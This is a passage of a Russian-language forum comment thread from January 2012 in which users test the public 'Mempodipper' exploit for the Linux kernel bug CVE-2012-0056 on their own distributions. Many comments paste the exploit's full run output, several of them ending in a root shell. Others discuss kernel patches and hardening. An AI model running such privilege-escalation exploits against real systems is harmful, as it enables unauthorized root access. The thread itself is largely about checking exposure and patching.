    3 3-rc1 - не работает Mempodipper ... весь текст скрыт [показать]
     
     
  • 2.70, имя (?), 19:15, 23/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    web ? )
     
  • 1.78, Аноним (-), 19:57, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    bash-4 1 a out Mempodipper ... весь текст скрыт [показать]
     
     
  • 2.81, Денис (??), 20:07, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    user0 homelinux test a out Memp... весь текст скрыт [показать]
     
     
  • 3.194, Аноним (-), 01:14, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Ошибка сегментирования

    В арче даже сплойты работают с багами :)

     
  • 1.83, Злыдень (??), 20:38, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    > Дополнение 3: Вышло обновление с устранением уязвимости для Ubuntu 11.10.

    Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

     
     
  • 2.127, Аноним (-), 09:18, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    В Арче тоже уже доступно.
     
  • 2.162, Аноним (-), 15:41, 24/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    > Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

    Но зато оно не будет содержать новую уязвимость, в отличие от :)

     
     
  • 3.195, Аноним (-), 01:15, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Но зато оно не будет содержать новую уязвимость, в отличие от :)

    Что за новая уязвимость? Откуда дровишки?

     
  • 1.86, meequz (ok), 20:53, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    В Mandriva 2011 не работает. Ни 38 ядром, ни с 39.
     
  • 1.93, Аноним (-), 21:47, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Странно:

    glsa-check -t all
    This system is not affected by any of the listed GLSAs

    uname -r
    3.2.1-gentoo

     
     
  • 2.118, I am (??), 02:31, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Странно:
    > glsa-check -t all
    > This system is not affected by any of the listed GLSAs
    > uname -r
    > 3.2.1-gentoo

    На ядра GLSA не публикуют.

     
  • 1.94, Аноним (-), 21:54, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Linux da_desktop 3 1 9-1 fc16 i686 PAE 1 SMP Fri Jan 13 16 57 54 UTC 2012 i686 ... весь текст скрыт [показать]
     
  • 1.98, Аноним (-), 22:47, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    в aptosid ещё 20 числа выпустили апдейт
     
  • 1.100, Аноним (-), 22:58, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    RHEL 6.1 - не работает
     
  • 1.101, dAverk (??), 23:06, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Трижды попробовал. ЧЯДНТ? :(

    [dAverk@dAverk ~]$ ./mempodipper
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/7121/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x21a8.
    [+] Calculating su padding.
    [+] Seeking to offset 0x2186.
    [+] Executing su with shellcode.
    [dAverk@dAverk ~]$ whoami
    dAverk
    [dAverk@dAverk ~]$ uname -a
    Linux dAverk.4820TG 3.1.7-1.fc16.x86_64 #1 SMP Tue Jan 3 19:45:05 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
    [dAverk@dAverk ~]$ cat /etc/redhat-release
    RFRemix release 16 (Verne)
    [dAverk@dAverk ~]$ id
    uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)

     
     
  • 2.102, dAverk (??), 23:08, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    Ща ещё обновимся до 3.1.9 и заодно на 6м центе и дебах 5/6 посмотрим-с
     
     
  • 3.104, dAverk (??), 23:25, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    на 3 1 9 тоже не завелось dAverk dAverk mempodipper ... весь текст скрыт [показать]
     
  • 3.109, dAverk (??), 23:46, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    на 5м дебе старое ядро, на 6м работает На 6й центе даже gcc отродясь не было, н... весь текст скрыт [показать]
     
     
  • 4.134, dAverk (??), 10:11, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    на 2.6.32-220 Centos 6 Не заработало
    [admin@samba ~]$ uname -a
    Linux samba.unesko 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
     
  • 4.148, Аноним (-), 12:42, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > на 5м дебе старое ядро, на 6м работает.

    Ты что-то попутал. В squeeze 2.6.32

     
     
  • 5.158, dAverk (??), 15:23, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    >> на 5м дебе старое ядро, на 6м работает.
    > Ты что-то попутал. В squeeze 2.6.32

    Каюсь - чёрт меня попутал. На тестовой машине смотрел, а у меня там из wheezy ядрышко :)

     
  • 1.107, Гентушник (ok), 23:34, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    На Gentoo 3.1.5-hardened x86_64 не работает.
    Даже chmod a+r /bin/su не помогает.
    Вот так всегда :(
     
     
  • 2.110, Гентушник (ok), 23:54, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    test naodesu CVE-2012-0056 mempodipper ... весь текст скрыт [показать]
     
  • 1.113, arisu (ok), 23:59, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    хм.

    uname -a
    Linux 3.1.5 #2 SMP Sat Dec 10 22:58:40 EET 2011 i686 Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz GenuineIntel GNU/Linux

    ./mempodipper
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/10462/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [-] Could not resolve /bin/su. Specify the exit@plt function address manually.
    [-] Usage: ./mempodipper -o ADDRESS
    [-] Example: ./mempodipper -o 0x402178

    не работает. %-(

     
     
  • 2.115, arisu (ok), 00:04, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    после objdump и указания адреса — тоже. пичалька.
     
  • 1.124, reinhard (ok), 07:20, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    bash-4.2$ uname -a
    Linux spring.bit.ab.ru 2.6.41.1-1.fc15.i686 #1 SMP Fri Nov 11 21:50:36 UTC 2011 i686 i686 i386 GNU/Linux
    bash-4.2$ ./a.out
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/2478/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x1734.
    [+] Calculating su padding.
    [+] Seeking to offset 0x1726.
    [+] Executing su with shellcode.
    bash-4.2$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody)

     
  • 1.125, Флинт (?), 07:39, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    [alexander@localhost ~]$ ./mempodipper
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/5212/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x1984.
    [+] Calculating su padding.
    [+] Seeking to offset 0x1962.
    [+] Executing su with shellcode.
    [alexander@localhost ~]$ whoami
    alexander
    [alexander@localhost ~]$ uname -r
    2.6.39.4-5.1-desktop
    [alexander@localhost ~]$

    ROSA 2011 не работает! :)

     
  • 1.126, CHERTS (??), 08:19, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает
     
     
  • 2.153, Аноним (-), 13:41, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает

    так уже апдейт вышел

     
     
  • 3.163, Аноним (-), 15:49, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > так уже апдейт вышел

    ... с новой дырой в комплекте :)

     
  • 1.128, Ващенаглухо (ok), 09:26, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/13961/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [-] Could not resolve /bin/su. Specify the exit@plt function address manually.
    [-] Usage: /tmp/CVE-201209956 -o ADDRESS
    [-] Example: /tmp/CVE-201209956 -o 0x402178

    Не работает на 3.0.4-hardened-r5, другого и не ожидал.

     
     
  • 2.168, Пиу (?), 17:09, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    на обычной генте тоже не работает - /bin/su закрыт на чтение
     
  • 1.129, FiX лень логиниться (?), 09:46, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В арче запатчено:

    /var/abs/core/linux $ cat PKGBUILD |grep CVE-2012-0056
            'CVE-2012-0056.patch')
      # patch for CVE-2012-0056
      patch -p1 -i "${srcdir}/CVE-2012-0056.patch"

     
  • 1.131, EuPhobos (ok), 09:58, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Дополнения к новости совсем не радуют.
     
     
  • 2.133, dAverk (??), 09:59, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Дополнения к новости совсем не радуют.

    Какие именно? :D

     
     
  • 3.164, Аноним (-), 15:50, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    >> Дополнения к новости совсем не радуют.
    > Какие именно? :D

    То, что вместе с патчем в убунту прилетела новая дыра.

     
  • 2.140, Andrey Mitrofanov (?), 10:46, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Как ни странно, дополнение про Андроид может кого-то и порадовать очередной икс... весь текст скрыт [показать]
     
  • 1.135, artem (??), 10:16, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Fedora 16.

    uname -a
    Linux notebook.blahblah 3.1.9-1.fc16.i686 #1 SMP Fri Jan 13 17:14:41 UTC 2012 i686 i686 i386 GNU/Linux

    $ ./a.out
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/4736/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x1524.
    [+] Calculating su padding.
    [+] Seeking to offset 0x1502.
    [+] Executing su with shellcode.
    [artem@notebook eatme]$ whoami
    artem

    Как-то так, в общем.

     
     
  • 2.139, AlexYeCu (ok), 10:45, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Опа. Может поэтому федоровцы и не шевелятся?
     
     
  • 3.142, artem (??), 11:10, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Возможно, но вот что есть, то есть. не сработало оно у меня. :)
     
  • 2.143, Tav (ok), 11:22, 24/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    «Note: Fedora defaults to /proc/sys/kernel/randomize_va_space = 2, which makes
    this more difficult to exploit.»

    https://bugzilla.redhat.com/show_bug.cgi?id=782681

     
  • 1.136, SubGun (ok), 10:16, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Сколько народу поскачивало эксплойт :DDD Надо бы туда вирусняк затолкать, чтобы веселей было.
     
     
  • 2.137, dAverk (??), 10:28, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Надо было А то я зря сидел смотрел что оно делает в виртуалке, думал хоть бэкду... весь текст скрыт [показать]
     
     
  • 3.138, arisu (ok), 10:41, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    а почитать исходник не судьбец, видимо.
     
     
  • 4.141, dAverk (??), 10:48, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > а почитать исходник не судьбец, видимо.

    Читал, но всё равно для собственного спокойствия проверил :)

     
  • 2.155, 57349817591 (?), 14:12, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Неосилила настройку приоритетов репозиториев?
     
  • 1.149, Аноним (-), 12:51, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает.
     
     
  • 2.171, vle (ok), 17:23, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает.

    На то он собственно и hardened.
    В том его задача.

     
  • 1.172, Аноним (-), 17:26, 24/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    А кто-нибудь может пояснить зачем вообще нужна поддержка записи в proc pid mem ... весь текст скрыт [показать]
     
     
  • 2.177, arisu (ok), 21:34, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    для scanmem, например.
     
     
  • 3.196, Аноним (-), 01:21, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Ну вот вынести в отдельный sysctl, чтоли Надо далеко не всем, а потенциально - ... весь текст скрыт [показать]
     
     
  • 4.197, arisu (ok), 01:26, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    новый патч так и делает, тащемта 171 Add the proc_pid_mem sysctl to control... весь текст скрыт [показать]
     
  • 1.173, Йоптик (?), 19:24, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/

    ksodete@dev-tester ~/explo $ uname -a
    Linux dev-tester 3.1.5-gentoo #8 SMP Sun Jan 22 02:17:33 EET 2012 x86_64 Intel(R) Core(TM)2 Duo CPU E7300 @ 2.66GHz GenuineIntel GNU/Linux
    ksodete@dev-tester ~/explo $ whoami
    ksodete
    ksodete@dev-tester ~/explo $ gcc -o in mempodipper.c
    ksodete@dev-tester ~/explo $ ./in
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/12942/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Ptracing su to find next instruction without reading binary.
    [+] Resolved exit@plt to 0x402298.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40227d.
    [+] Executing su with shellcode.
    sh-4.2# whoami
    root
    sh-4.2# rm -r /te.cpp
    sh-4.2#
    ...
    Бл***

     
  • 1.174, Йоптик (?), 21:16, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Негентушный способ для гентушников. Получилось закрыть дырку. Правда, сделал немного тупо, но ничего, работает.
    1. # cd /usr/src/linux
    2. nano 2100_proc-mem-handling-fix.patch
    3. Копипастинг текста отсюда: http://sources.gentoo.org/viewcvs.py/gentoo-x86/sys-kernel/pf-sources/files/2

    4. ctrl + o
    5. # cd fs/proc/
    6. # patch ../../2100_proc-mem-handling-fix.patch
    7. # make && make modules_install
    8. cp arch/<arch>/boot/bzImage /boot/kernel-<version>-gentoo
    9. # reboot

    ksodete@dev-tester ~ $ ./in
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/4157/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Ptracing su to find next instruction without reading binary.
    [+] Resolved exit@plt to 0x402298.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40227d.
    [+] Executing su with shellcode.
    ksodete@dev-tester ~ $ whoami
    ksodete
    ksodete@dev-tester ~ $

     
     
  • 2.229, Ващенаглухо (ok), 10:07, 27/01/2012 [^] [ответить]    [к модератору]  
  • +/
    что люди только не придумают,лишь бы не использовать hardened-sources
     
  • 1.175, Йоптик (?), 21:17, 24/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Ой, сори-сори
    ---6. # patch ../../2100_proc-mem-handling-fix.patch
    +++6. # patch -i ../../2100_proc-mem-handling-fix.patch
     
  • 1.198, Sw00p aka Jerom (?), 01:31, 25/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    на RHEL старом ваще не компилится )))

    2.6.18-8.el5

    ругается на pipe2 (заменил на пайп всё равно не работает - висит на чтении)

    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Ptracing su to find next instruction without reading binary.
    [+] Creating ptrace pipe.
    [+] Forking ptrace child.
    [+] Ptrace_traceme'ing process.
    [+] Waiting for ptraced child to give output on syscalls.


    ---------------

    скачал под федору эксплоит с использованием не su а gpasswd - тоже не сработал - даже отрубил  ASLR

    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/3593/mem in child.
    [+] Sending fd 6 to parent.
    [+] Received fd at 6.
    [+] Assigning fd 6 to stderr.
    [+] Reading gpasswd for exit@plt.
    [+] Resolved exit@plt to 0x8049900.
    [+] Calculating gpasswd padding.
    [+] Seeking to offset 0x80498f1.
    [+] Executing gpasswd with shellcode.
    unknown group: 1۰1۰.1ɳ?1�hn/shh//bi��-iR��PS��0

    gpasswd: Permission denied

     
     
  • 2.199, arisu (ok), 01:33, 25/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    во-первых: сказали же: 2.6.39.

    во-вторых: если
    > ругается на pipe2

    препятствие — лучше никогда ничего не компилируй больше.

     
     
  • 3.200, Sw00p aka Jerom (?), 01:43, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    спасибо за совет - поэтому я три года не апдейтил редхат вот лучше этим пров... весь текст скрыт [показать]
     
     
  • 4.201, arisu (ok), 01:56, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    а зачем мне этот странный код как будто я не понял, что делает сплойт, как, зач... весь текст скрыт [показать]
     
     
  • 5.204, Sw00p aka Jerom (?), 02:21, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    бэээээээээээ старый либси ))
     
  • 5.205, Йоптик (ok), 03:16, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Вот и у меня подобная ситуация качать ядро 3 2 x 70 МБ через GPRS в 3 кб с с... весь текст скрыт [показать]
     
     
  • 6.207, arisu (ok), 03:43, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    ну, на 3.1.5 патч просто так не ложится, надо немного знать, что там в ведре творится и подпилить. или просто вкорячить жестокий r/o на /proc/pid/mem (что я и сделал, тащемта, особо не напрягаясь).
     
     
  • 7.213, Йоптик (ok), 04:19, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    offtop Жёстко Я тоже подумывал сделать proc pid mem ридонли, но передумал,... весь текст скрыт [показать]
     
     
  • 8.214, arisu (ok), 04:55, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    да пофигу, в принципе то есть, у 171 средниего юзера 187 ничего не сломаетс... весь текст скрыт [показать]
     
  • 4.206, Йоптик (ok), 03:22, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    ksodete dev-tester explo gcc -o cp cp c ksodete dev-tester explo cp v... весь текст скрыт [показать]
     
     
  • 5.208, arisu (ok), 03:44, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Да, пичяль-пичялюшка-пичялька, и это даже после патчинга /usr/src/linux/fs/proc/base.c

    sysctl -w kernel.proc_pid_mem=1 сделал? по-умолчанию всё разрешено.

     
     
  • 6.209, Йоптик (ok), 04:07, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Честно говоря - не делал.
    Ответ команды:
    # error: "kernel.proc_pid_mem" is an unknown key
    если сделал что-то не так - сори, значит просто не понял вопрос.
     
     
  • 7.210, arisu (ok), 04:08, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    или неверно наложил патч наложил не весь патч не наложился , или забыл ребутнут... весь текст скрыт [показать]
     
     
  • 8.212, Йоптик (ok), 04:17, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Скорее всего первое, ибо я параноидально, после каждого рекомпилинга ядра, делаю... весь текст скрыт [показать]
     
     
  • 9.215, arisu (ok), 04:56, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    доверяй сплойту, не доверяй «чекеру». гентушный патч по логике не такой, как из LKML. так что проверяй именно запуском сплойта.
     
     
  • 10.216, Йоптик (ok), 16:13, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Кстати, Вы оказались абсолютно правы Дело в том, что я накладывал патч от Лин... весь текст скрыт [показать]
     
     
  • 11.219, arisu (ok), 19:42, 25/01/2012 [^] [ответить]     [к модератору]  
  • –1 +/
    да ерунда, не всем же ядерными хакерами быть заработало точнее, не заработало ... весь текст скрыт [показать]
     
     
  • 12.220, Sw00p aka Jerom (?), 23:15, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    вы сначало на домен в сылке посмотрите потом тут из себя гуру стройте пс от вас... весь текст скрыт [показать]
     
     
  • 13.222, arisu (ok), 00:09, 26/01/2012 [^] [ответить]     [к модератору]  
  • –1 +/
    и что я должен увидеть в имени домена или сразу начинать бить земные поклоны а... весь текст скрыт [показать]
     
     
  • 14.226, Sw00p aka Jerom (?), 14:05, 26/01/2012 [^] [ответить]    [к модератору]  
  • +/
    >>не только «собрался», но и запускаю.

    удачи вам ))

     
     
  • 15.227, arisu (ok), 14:40, 26/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    > удачи вам ))

    удача нужна тем, кто совершает шаманские действия не понимая их смысла. я к таким не отношусь.

     
     ....нить скрыта, показать (20)

  • 1.223, Аноним (223), 02:53, 26/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    подскажите пожалуйста как в debian закрыть багу?

    apt-get install -y systemtap linux-image-$(uname -r)-dbg

    выдает ошибку '('

     
  • 1.224, ozs (ok), 03:27, 26/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Slackware GNU/Linux kernel-3.0.17 Intel(R) Core(TM)2 Duo CPU
    ./mempodipper
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Ptracing su to find next instruction without reading binary.
    [+] Creating ptrace pipe.
    [+] Forking ptrace child.
    [+] Waiting for ptraced child to give output on syscalls.
    [+] Ptrace_traceme'ing process.
    [+] Error message written. Single stepping to find address.
    [+] Resolved call address to 0x80499e8.
    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/2695/mem in child.
    [+] Sending fd 6 to parent.
    [+] Received fd at 6.
    [+] Assigning fd 6 to stderr.
    [+] Calculating su padding.
    [+] Seeking to offset 0x80499dc.
    [+] Executing su with shellcode.
    sh-4.1# test
    sh-4.1# id
    uid=0(root) gid=0(root) groups=0(root)

     
  • 1.228, Аноним (-), 08:39, 27/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Я новичок в этом деле Кто-нибудь, помогите Пытался по всякому с шелкодами и ... весь текст скрыт [показать]
     
     
  • 2.230, Йоптик (ok), 14:17, 27/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Эм... Во-первых, в новости написано:
    > Проблема наблюдается, начиная с ядра 2.6.39

    Во вторых, я так и не пойму, что у тебя в целях? Запустить сплойт? А зачем?

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor